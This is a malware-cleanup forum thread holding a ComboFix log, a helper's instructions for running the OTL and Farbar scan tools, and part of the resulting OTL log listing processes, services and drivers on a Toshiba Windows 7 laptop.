S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3hub.sys [x]

S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3xhc.sys [x]

S3 PGEffect;Pangu effect driver;c:\windows\system32\DRIVERS\pgeffect.sys;c:\windows\SYSNATIVE\DRIVERS\pgeffect.sys [x]

S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]

S3 TMachInfo;TMachInfo;c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe;c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [x]

S3 TOSHIBA HDD SSD Alert Service;TOSHIBA HDD SSD Alert Service;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [x]

S3 TPCHSrv;TPCH Service;c:\program files\TOSHIBA\TPHM\TPCHSrv.exe;c:\program files\TOSHIBA\TPHM\TPCHSrv.exe [x]

S4 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]

.

.

--- Other Services/Drivers In Memory ---

.

*NewlyCreated* - MBAMSWISSARMY

.

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]

2014-10-21 16:39 1089352 ----a-w- c:\program files (x86)\Google\Chrome\Application\38.0.2125.104\Installer\chrmstp.exe

.

Contents of the 'Scheduled Tasks' folder

.

2014-10-29 c:\windows\Tasks\Adobe Flash Player Updater.job

- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-02 01:24]

.

2014-10-25 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job

- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-03-24 18:59]

.

2014-10-29 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job

- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-03-24 18:59]

.

2014-10-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job

- c:\users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-12 01:07]

.

2014-10-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job

- c:\users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-12 01:07]

.

.

--------- X64 Entries -----------

.

.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ThpSrv"="c:\windows\system32\thpsrv" [X]

"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-07-02 167704]

"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-07-02 392472]

"Persistence"="c:\windows\system32\igfxpers.exe" [2011-07-02 416024]

"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2011-01-26 11775592]

"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2011-01-18 2188904]

"IntelPAN"="c:\program files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" [2011-06-01 1935120]

"TosSENotify"="c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe" [2011-06-10 710560]

"TosVolRegulator"="c:\program files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe" [2009-11-11 24376]

.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]

"AppInit_DLLs"=c:\windows\System32\nvinitx.dll

.

------- Supplementary Scan -------

.

uLocal Page = c:\windows\system32\blank.htm

uStart Page = hxxp://start.toshiba.com/

mLocal Page = c:\windows\SysWOW64\blank.htm

uInternet Settings,ProxyOverride = <local>;192.168.*.*

IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000

IE: Se&nd to OneNote - c:\progra~2\MICROS~3\Office14\ONBttnIE.dll/105

TCP: DhcpNameServer = 192.168.1.254

DPF: {36299202-09EF-4ABF-ADB9-47C599DBE778} - hxxps://www.hpwindows7upgrade.arvato.com/north_america/Endcustomer/HPProdDetect.cab

.

- - - - ORPHANS REMOVED - - - -

.

Toolbar-Locked - (no file)

Wow6432Node-HKLM-Run-TSleepSrv - %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe

HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start

Toolbar-Locked - (no file)

HKLM-Run-TPwrMain - c:\program files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE

HKLM-Run-HSON - c:\program files (x86)\TOSHIBA\TBS\HSON.exe

HKLM-Run-TCrdMain - c:\program files (x86)\TOSHIBA\FlashCards\TCrdMain.exe

HKLM-Run-SynTPEnh - c:\program files (x86)\Synaptics\SynTP\SynTPEnh.exe

HKLM-Run-Teco - c:\program files (x86)\TOSHIBA\TECO\Teco.exe

HKLM-Run-TosWaitSrv - c:\program files (x86)\TOSHIBA\TPHM\TosWaitSrv.exe

HKLM-Run-TosNC - c:\program files (x86)\Toshiba\BulletinBoard\TosNcCore.exe

HKLM-Run-TosReelTimeMonitor - c:\program files (x86)\TOSHIBA\ReelTime\TosReelTimeMonitor.exe

.

.

.

[HKEY_LOCAL_MACHINE\system\ControlSet001\services\N360]

"ImagePath"="\"c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe\" /s \"N360\" /m \"c:\program files (x86)\Norton 360\Engine\21.6.0.32\diMaster.dll\" /prefetch:1"

--

.

[HKEY_LOCAL_MACHINE\system\ControlSet001\services\PCCUJobMgr]

"ImagePath"="\"c:\program files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe\" /s \"PCCUJobMgr\" /m \"c:\program files (x86)\Norton PC Checkup\Engine\2.0.13.11\diMaster.dll\" /prefetch:1"

"ImagePath"="\SystemRoot\system32\drivers\N360x64\1506000.020\SYMNETS.SYS"

"TrustedImagePaths"="c:\program files (x86)\Norton 360\Engine\21.6.0.32;c:\program files (x86)\Norton 360\Engine64\21.6.0.32"

.

--------------------- LOCKED REGISTRY KEYS ---------------------

.

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]

@Denied: (A 2) (Everyone)

@="FlashBroker"

"LocalizedString"="@c:\\windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_167_ActiveX.exe,-101"

.

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]

"Enabled"=dword:00000001

.

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]

@="c:\\windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_167_ActiveX.exe"

.

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]

@Denied: (A 2) (Everyone)

@="IFlashBroker6"

.

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]

@="{00020424-0000-0000-C000-000000000046}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

"Version"="1.0"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]

@Denied: (A 2) (Everyone)

@="FlashBroker"

"LocalizedString"="@c:\\windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]

"Enabled"=dword:00000001

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]

@Denied: (A 2) (Everyone)

@="Shockwave Flash Object"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx"

"ThreadingModel"="Apartment"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]

@="0"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]

@="ShockwaveFlash.ShockwaveFlash.15"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx, 1"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]

@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]

@="1.0"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]

@="ShockwaveFlash.ShockwaveFlash"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]

@Denied: (A 2) (Everyone)

@="Macromedia Flash Factory Object"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx"

"ThreadingModel"="Apartment"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]

@="FlashFactory.FlashFactory.1"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]

@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx, 1"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]

@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]

@="1.0"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]

@="FlashFactory.FlashFactory"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]

@Denied: (A 2) (Everyone)

@="IFlashBroker6"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]

@="{00020424-0000-0000-C000-000000000046}"

.

[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]

@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

"Version"="1.0"

.

[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]

@Denied: (A) (Everyone)

"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"

.

[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3]

@Denied: (A) (Everyone)

.

[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]

"Key"="ActionsPane3"

"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"

.

[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]

@Denied: (Full) (Everyone)

.

Completion time: 2014-10-29 07:43:04

ComboFix-quarantined-files.txt 2014-10-29 12:42

.

Pre-Run: 317,728,055,296 bytes free

Post-Run: 317,590,884,352 bytes free

.

- - End Of File - - 500F346C1EA48CDF1B094B7850C8378B

[Naathim]

OK, now some other scans to catch up the remnants.



Scan with OTL

Please download OTL by OldTimer and save the file to your desktop.

• Right-click on icon and select Run as Administrator to start the tool.
• Make sure that Scan All Users, LOP check and Purity check are ticked.
• For 64-bit systems only - make sure that Include 64-bit option is also ticked.
• Sections Processes, Modules, Services, Drivers, Standard Registry are set to Use Safelist.
• Section Extra Registry is also set to Use Safelist.
• Under the Custom Scans/Fixes bar in the box paste in the following:
  

  BASESERVICESdrivers32

• Push Run Scan and wait patiently.
• Two notepad windows will be opened after this run: OTL.txt (maximized) and Extras.txt (minimized).

Please include the content of both logfiles in your next reply.


Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

• Right-click on icon and select Run as Administrator to start the tool.
  > XP users click run after receipt of Windows Security Warning - Open File.
  > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
• Make sure that Addition option is checked.
• Press Scan button and wait.
• The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

[adh]

OTL Logs

OTL logfile created on: 10/29/2014 8:09:31 AM - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ADH.Heathman-PC\Desktop

64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.17116)

Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

7.91 Gb Total Physical Memory | 4.75 Gb Available Physical Memory | 60.09% Memory free

15.82 Gb Paging File | 12.42 Gb Available in Paging File | 78.55% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)

Drive C: | 449.23 Gb Total Space | 295.86 Gb Free Space | 65.86% Space Free | Partition Type: NTFS

Computer Name: HEATHMAN-PC | User Name: ADH | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2014/10/29 08:04:02 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

PRC - [2014/10/01 11:09:30 | 000,968,504 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

PRC - [2014/10/01 11:09:28 | 001,871,160 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

PRC - [2014/10/01 11:09:20 | 007,229,752 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

PRC - [2014/09/21 05:17:47 | 000,265,040 | R--- | M] (Symantec Corporation) -- C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

PRC - [2014/09/04 05:50:02 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

PRC - [2014/03/29 20:15:30 | 000,309,704 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe

PRC - [2013/11/15 09:24:50 | 000,137,528 | ---- | M] (Motorola Mobility LLC) -- C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe

PRC - [2013/11/14 19:18:02 | 000,698,680 | ---- | M] (Motorola Mobility LLC) -- C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe

PRC - [2013/06/28 17:48:04 | 000,014,624 | ---- | M] (Intuit Inc.) -- C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe

PRC - [2012/11/20 08:27:33 | 000,132,056 | ---- | M] (Symantec Corporation) -- C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe

PRC - [2012/09/07 21:36:46 | 000,087,992 | ---- | M] (Nero AG) -- C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe

PRC - [2012/06/21 05:01:58 | 000,092,632 | ---- | M] (TomTom) -- C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe

PRC - [2012/02/29 19:02:00 | 002,348,352 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

PRC - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) -- C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe

PRC - [2011/07/19 10:59:30 | 000,126,392 | R--- | M] (Symantec Corporation) -- C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

PRC - [2011/03/11 16:14:58 | 000,030,064 | ---- | M] () -- c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe

PRC - [2011/02/01 15:24:42 | 002,656,280 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

PRC - [2011/02/01 15:24:40 | 000,326,168 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

PRC - [2010/08/23 20:21:40 | 000,013,672 | ---- | M] (Intuit Inc.) -- C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe

PRC - [2010/08/16 12:54:50 | 000,034,160 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe

PRC - [2010/06/04 18:32:58 | 000,252,792 | ---- | M] (TOSHIBA) -- C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe

PRC - [2010/03/11 16:06:06 | 000,193,824 | ---- | M] (Protexis Inc.) -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe

PRC - [2009/12/09 16:01:20 | 000,606,208 | ---- | M] () -- C:\Windows\Samsung\PanelMgr\SSMMgr.exe

========== Modules (No Company Name) ==========

MOD - [2014/01/20 14:17:04 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll

MOD - [2014/01/20 14:16:38 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

MOD - [2009/12/09 16:01:20 | 000,606,208 | ---- | M] () -- C:\Windows\Samsung\PanelMgr\SSMMgr.exe

========== Services (SafeList) ==========

SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)

SRV:64bit: - [2011/07/01 13:46:14 | 000,828,856 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe -- (TPCHSrv)

SRV:64bit: - [2011/06/09 23:10:00 | 000,138,152 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe -- (TOSHIBA HDD SSD Alert Service)

SRV:64bit: - [2011/06/01 14:38:30 | 001,517,328 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\WiFi\bin\EvtEng.exe -- (EvtEng)

SRV:64bit: - [2011/06/01 14:23:40 | 000,340,240 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe -- (MyWiFiDHCPDNS)

SRV:64bit: - [2011/06/01 14:19:58 | 000,844,560 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe -- (RegSrvc)

SRV:64bit: - [2011/05/24 11:58:12 | 000,294,848 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files\TOSHIBA\TECO\TecoService.exe -- (TOSHIBA eco Utility Service)

SRV:64bit: - [2011/05/17 16:34:18 | 000,574,896 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe -- (TosCoSrv)

SRV:64bit: - [2011/04/20 17:16:04 | 000,558,592 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Windows\SysNative\ThpSrv.exe -- (Thpsrv)

SRV:64bit: - [2010/10/20 16:41:00 | 000,138,656 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Windows\SysNative\TODDSrv.exe -- (TODDSrv)

SRV:64bit: - [2010/09/22 21:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)

SRV - [2014/10/01 11:09:30 | 000,968,504 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe -- (MBAMService)

SRV - [2014/10/01 11:09:28 | 001,871,160 | ---- | M] (Malwarebytes Corporation) [Disabled | Running] -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)

SRV - [2014/09/23 20:24:22 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2014/09/21 05:17:47 | 000,265,040 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe -- (N360)

SRV - [2014/09/04 05:50:02 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)

SRV - [2014/03/20 17:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)

SRV - [2013/11/15 09:24:50 | 000,137,528 | ---- | M] (Motorola Mobility LLC) [Auto | Running] -- C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe -- (Motorola Device Manager)

SRV - [2013/09/11 22:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)

SRV - [2013/06/28 17:48:04 | 000,014,624 | ---- | M] (Intuit Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe -- (IntuitUpdateServiceV4)

SRV - [2012/11/20 08:27:33 | 000,132,056 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe -- (Norton PC Checkup Application Launcher)

SRV - [2012/09/07 21:36:46 | 000,087,992 | ---- | M] (Nero AG) [Auto | Running] -- C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe -- (DeviceMonitorService)

SRV - [2012/06/21 05:01:58 | 000,092,632 | ---- | M] (TomTom) [Auto | Running] -- C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe -- (TomTomHOMEService)

SRV - [2012/02/29 19:02:00 | 002,348,352 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)

SRV - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) [Auto | Running] -- C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe -- (PST Service)

SRV - [2011/07/19 10:59:30 | 000,126,392 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe -- (PCCUJobMgr)

SRV - [2011/07/11 19:16:06 | 000,057,216 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe -- (TMachInfo)

SRV - [2011/03/11 16:14:58 | 000,030,064 | ---- | M] () [Auto | Running] -- c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe -- (UDSS)

SRV - [2011/02/01 15:24:42 | 002,656,280 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)

SRV - [2011/02/01 15:24:40 | 000,326,168 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)

SRV - [2010/10/12 12:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)

SRV - [2010/08/23 20:21:40 | 000,013,672 | ---- | M] (Intuit Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe -- (IntuitUpdateService)

SRV - [2010/03/11 16:06:06 | 000,193,824 | ---- | M] (Protexis Inc.) [Auto | Running] -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe -- (PSI_SVC_2)

========== Driver Services (SafeList) ==========

DRV:64bit: - [2014/10/29 08:08:46 | 000,129,752 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)

DRV:64bit: - [2014/10/19 16:00:47 | 000,177,752 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SYMEVENT64x86.SYS -- (SymEvent)

DRV:64bit: - [2014/10/01 11:11:26 | 000,063,704 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mwac.sys -- (MBAMWebAccessControl)

DRV:64bit: - [2014/10/01 11:11:12 | 000,025,816 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)

DRV:64bit: - [2014/08/25 21:26:58 | 000,593,112 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\symnets.sys -- (SymNetS)

DRV:64bit: - [2014/08/25 21:26:57 | 001,148,120 | R--- | M] (Symantec Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\SymEFA64.sys -- (SymEFA)

DRV:64bit: - [2014/08/25 21:26:56 | 000,493,656 | R--- | M] (Symantec Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\SymDS64.sys -- (SymDS)

DRV:64bit: - [2014/08/25 21:20:22 | 000,876,248 | R--- | M] (Symantec Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\srtsp64.sys -- (SRTSP)

DRV:64bit: - [2014/08/25 21:20:22 | 000,037,592 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\srtspx64.sys -- (SRTSPX)

DRV:64bit: - [2014/08/06 14:48:16 | 000,266,968 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\Ironx64.sys -- (SymIRON)

DRV:64bit: - [2014/02/20 18:14:34 | 000,162,392 | R--- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\N360x64\1506000.020\ccSetx64.sys -- (ccSet_N360)

DRV:64bit: - [2013/10/01 21:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)

